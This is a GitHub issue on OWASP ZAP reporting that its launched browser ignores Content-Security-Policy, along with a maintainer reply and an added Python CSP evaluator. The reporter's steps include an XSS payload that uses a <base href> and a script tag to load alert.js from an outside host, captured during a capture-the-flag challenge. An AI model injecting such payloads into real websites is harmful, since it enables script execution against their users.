
CSP does not seem to work normally in launched browser #7191

Open
1 task
hahwul opened this issue Apr 7, 2022 · 2 comments

Comments

@hahwul

hahwul commented Apr 7, 2022

Describe the bug

Hi team.
This is an issue that I experienced while solving the Intigriti XSS 0322 challenge recently.
CSP exists in the Response as shown below, but the CSP is not processed in the pre-configured browser.

Of course, I spent a little more time and eventually bypassed CSP. However, I was excited for a while because of the alert() of the pre-configured browser at the beginning of the test.

However, analysts who use ZAP should also be protected by CSP, and normal operation of CSP is required for accurate testing. Submitting because it appears to be an issue :D

Request

POST https://challenge-0322.intigriti.io/challenge/LoveReceiver.php HTTP/1.1

token=b037132edc1c393820596e2bfd647b05823ed1c779950cd4eb2263fa0a32ebfe&FirstText=%3Cbase+href%3D%27https%3A%2F%2Fpocs.hahwul.com%2F%27%3E%3Cscript+src%3D%27%2Falert.js%27%3E%3C%2Fscript%3E&Hashing=aaa

Response header

HTTP/1.1 200 OK
Date: Thu, 07 Apr 2022 14:09:04 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1476
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
content-security-policy: default-src 'none'; style-src 'nonce-ba27d332f3cb20800894e2bf6e7f61e3aeb6bd04'; script-src 'nonce-ba27d332f3cb20800894e2bf6e7f61e3aeb6bd04'; img-src 'self'
Vary: Accept-Encoding

Screenshot 2022-04-07 11:10:22 PM

I checked the options and scripts just in case the CSP Disable option was turned on, but there was nothing like that.

Screenshot 2022-04-07 11:23:42 PM
Screenshot 2022-04-07 11:23:47 PM

Steps to reproduce the behavior

  1. Open the https://challenge-0322.intigriti.io/challenge/LoveSender.php page
  2. Input payload
     Plain text: `<base href='https://pocs.hahwul.com/'><script src='/alert.js'></script>`
     Hashing algorithm: aaaa
  3. A script is inserted into the Response and is protected by the CSP. Of course, the core of this challenge was CSP, but in the ZAP pre-configured browser, the CSP is ignored and the script works.

Expected behavior

The XSS code does not work (because it is protected by the CSP)

Software versions

OWASP ZAP
Version: 2.11.1
---
Installed Add-ons: [[id=accessControl, version=7.0.0],
[id=alertFilters, version=13.0.0], [id=allinonenotes,
version=2.0.0], [id=amf, version=3.0.0], [id=ascanrules,
version=46.0.0], [id=ascanrulesAlpha, version=37.0.0],
[id=ascanrulesBeta, version=40.0.0],
[id=attacksurfacedetector, version=1.1.4], [id=authstats,
version=2.0.0], [id=automation, version=0.14.0],
[id=browserView, version=5.0.0], [id=bruteforce,
version=11.0.0], [id=bugtracker, version=3.0.0],
[id=callgraph, version=5.0.0], [id=callhome, version=0.3.0],
[id=codedx, version=9.0.0], [id=commonlib, version=1.9.0],
[id=communityScripts, version=14.0.0], [id=custompayloads,
version=0.11.0], [id=diff, version=11.0.0],
[id=directorylistv1, version=5.0.0],
[id=directorylistv2_3_lc, version=4.0.0], [id=domxss,
version=12.0.0], [id=encoder, version=0.6.0],
[id=evalvillain, version=0.1.1], [id=exim, version=0.1.0],
[id=fileupload, version=1.1.0], [id=formhandler,
version=4.0.0], [id=fuzz, version=13.6.0], [id=fuzzdb,
version=8.0.0], [id=gettingStarted, version=13.0.0],
[id=graaljs, version=0.2.0], [id=graphql, version=0.9.0],
[id=groovy, version=3.1.0], [id=help, version=14.0.0],
[id=highlighter, version=8.0.0], [id=hud, version=0.13.0],
[id=imagelocationscanner, version=3.0.0], [id=importurls,
version=9.0.0], [id=invoke, version=11.0.0], [id=jruby,
version=8.0.0], [id=jsonview, version=2.0.0], [id=jwt,
version=1.0.2], [id=jython, version=12.0.0], [id=kotlin,
version=1.1.0], [id=neonmarker, version=1.4.0], [id=network,
version=0.2.0], [id=oast, version=0.10.0], [id=onlineMenu,
version=9.0.0], [id=openapi, version=27.0.0], [id=plugnhack,
version=12.0.0], [id=portscan, version=9.0.0],
[id=pscanrules, version=40.0.0], [id=pscanrulesAlpha,
version=35.0.0], [id=pscanrulesBeta, version=29.0.0],
[id=quickstart, version=33.0.0], [id=reflect,
version=0.0.11], [id=regextester, version=2.0.0],
[id=replacer, version=9.0.0], [id=reports, version=0.13.0],
[id=requester, version=5.0.0], [id=retest, version=0.2.0],
[id=retire, version=0.10.0], [id=reveal, version=4.0.0],
[id=revisit, version=4.0.0], [id=saml, version=9.0.0],
[id=saverawmessage, version=7.0.0], [id=savexmlmessage,
version=0.3.0], [id=scripts, version=30.0.0], [id=selenium,
version=15.8.0], [id=sequence, version=6.0.0], [id=soap,
version=13.0.0], [id=spiderAjax, version=23.7.0],
[id=sqliplugin, version=15.0.0], [id=sse, version=10.0.0],
[id=svndigger, version=4.0.0], [id=tips, version=9.0.0],
[id=tokengen, version=15.0.0], [id=treetools,
version=8.0.0], [id=viewstate, version=3.0.0],
[id=wappalyzer, version=21.9.0], [id=webdrivermacos,
version=37.0.0], [id=websocket, version=25.0.0], [id=zest,
version=35.0.0]]
---
Operating System: Mac OS X
Java Version: Eclipse Foundation 11.0.12
System's Locale: ko_KR
Display Locale: en_GB
Format Locale: ko_KR
ZAP Home Directory: /Users/ichei/Library/Application Support/ZAP/
ZAP Installation Directory: /Applications/OWASP ZAP.app/Contents/Java/./
Look and Feel: FlatLaf Dark (com.formdev.flatlaf.FlatDarkLaf)

Screenshots

No response

Errors from the zap.log file

No response

Additional context

No response

Would you like to help fix this issue?

  • Yes
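To make the expected behaviour in the report concrete, here is an added example (not ZAP's code, and not part of the original issue) that evaluates the quoted `content-security-policy` header against the injected payload. It implements a simplified subset of CSP3 source matching: `'none'`, `'self'`, `'nonce-…'`, `'unsafe-inline'`, scheme sources and host sources, plus the default-src fallback chain. Hash sources, `'strict-dynamic'`, redirects and the `http`-to-`https` port upgrade rule are deliberately left out. The nonce and the page URL are taken from the report; the `cdn.example.com` policy used in the usage section is constructed for illustration.

```python
"""Minimal CSP evaluator: does the policy permit a given load?

Added example for the ZAP issue above; it is not ZAP code and only
covers the parts of CSP3 needed to reason about the quoted header.
"""
from urllib.parse import urlparse, urljoin

# Values copied from the response header quoted in the report.
NONCE = "ba27d332f3cb20800894e2bf6e7f61e3aeb6bd04"
CSP_HEADER = (
    "default-src 'none'; "
    f"style-src 'nonce-{NONCE}'; "
    f"script-src 'nonce-{NONCE}'; "
    "img-src 'self'"
)
PAGE_URL = "https://challenge-0322.intigriti.io/challenge/LoveReceiver.php"

# Abridged fetch-directive fallback chain (worker-src's extra hop via
# script-src is omitted for brevity).
FALLBACK = {
    "script-src": "default-src", "style-src": "default-src", "img-src": "default-src",
    "font-src": "default-src", "connect-src": "default-src", "media-src": "default-src",
    "object-src": "default-src", "child-src": "default-src",
    "frame-src": "child-src", "worker-src": "child-src",
}
DEFAULT_PORT = {"https": "443", "http": "80"}


def parse_csp(header: str) -> dict:
    """Split a CSP header into {directive: [source expressions]}.
    A repeated directive is ignored: the first occurrence wins, as in the spec."""
    policy = {}
    for directive in header.split(";"):
        tokens = directive.split()
        if tokens:
            policy.setdefault(tokens[0].lower(), tokens[1:])
    return policy


def effective_sources(policy: dict, directive: str):
    """Source list governing `directive`, following the fallback chain.
    None means no directive applies and the load is unrestricted."""
    while directive is not None:
        if directive in policy:
            return policy[directive]
        directive = FALLBACK.get(directive)
    return None


def _port_of(u) -> str:
    return str(u.port or DEFAULT_PORT.get(u.scheme, ""))


def _same_origin(a: str, b: str) -> bool:
    pa, pb = urlparse(a), urlparse(b)
    return (pa.scheme, pa.hostname, _port_of(pa)) == (pb.scheme, pb.hostname, _port_of(pb))


def _host_matches(expr: str, url: str) -> bool:
    """Match a scheme-source ('https:') or host-source ('*.example.com', 'https://h:443/p')."""
    u = urlparse(url)
    if "://" not in expr and expr.endswith(":"):          # scheme-source
        return u.scheme == expr[:-1].lower()
    if "://" in expr:
        scheme, _, rest = expr.partition("://")
    else:
        scheme, rest = None, expr
    if scheme and scheme.lower() != u.scheme:
        return False
    host, _, port = rest.split("/", 1)[0].partition(":")
    host, hostname = host.lower(), (u.hostname or "").lower()
    if host == "*":
        pass
    elif host.startswith("*."):
        if not hostname.endswith(host[1:]):                # ".example.com" suffix
            return False
    elif hostname != host:
        return False
    if port and port != "*" and _port_of(u) != port:
        return False
    return True


def is_allowed(policy: dict, directive: str, page_url: str,
               resource_url: str = None, nonce: str = None, inline: bool = False) -> bool:
    """Decide whether an element/load is permitted under `directive`."""
    sources = effective_sources(policy, directive)
    if sources is None:
        return True
    if all(s.lower() == "'none'" for s in sources):
        return False
    has_nonce_or_hash = any(s.startswith(("'nonce-", "'sha")) for s in sources)
    if nonce is not None and f"'nonce-{nonce}'" in sources:   # matching nonce wins
        return True
    if inline:
        # 'unsafe-inline' is ignored when the directive carries a nonce or hash.
        return "'unsafe-inline'" in sources and not has_nonce_or_hash
    for src in sources:
        if src.lower() == "'self'":
            if _same_origin(page_url, resource_url):
                return True
        elif not src.startswith("'") and _host_matches(src, resource_url):
            return True
    return False


def injected_script_url(base_href: str, src: str) -> str:
    """Resolve the injected <script src> the way the payload's <base href> makes the browser do."""
    return urljoin(base_href, src)
```

Running the quoted policy through `is_allowed` shows why the report expects no `alert()`: the injected `<script src='/alert.js'>` resolves (via the `<base href>`) to `https://pocs.hahwul.com/alert.js`, carries no nonce, and `script-src` lists only the nonce, so a conforming browser blocks it; a script tagged with the correct nonce is allowed, an image from the page's own origin is allowed by `'self'`, and a frame falls through `frame-src` to `child-src` to `default-src 'none'` and is blocked.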
@kingthorin
Member

I've added both the "add-on" and "Component-Docs" labels until we decide how we want to address this. Also, I've removed "bug" and added "enhancement" as (as far as I know) this is intentional, so adding an option etc. would be an enhancement.

@hahwul
Author

hahwul commented Apr 7, 2022

Hi @kingthorin
Thank you so very very much!
I don't know if I can be of any help, but I'll try my best to test it (if you need my help). I'm rooting for you!

@kingthorin kingthorin changed the title CSP does not seem to work normally in pre-configured browser. CSP does not seem to work normally in launched browser Apr 7, 2022

2 participants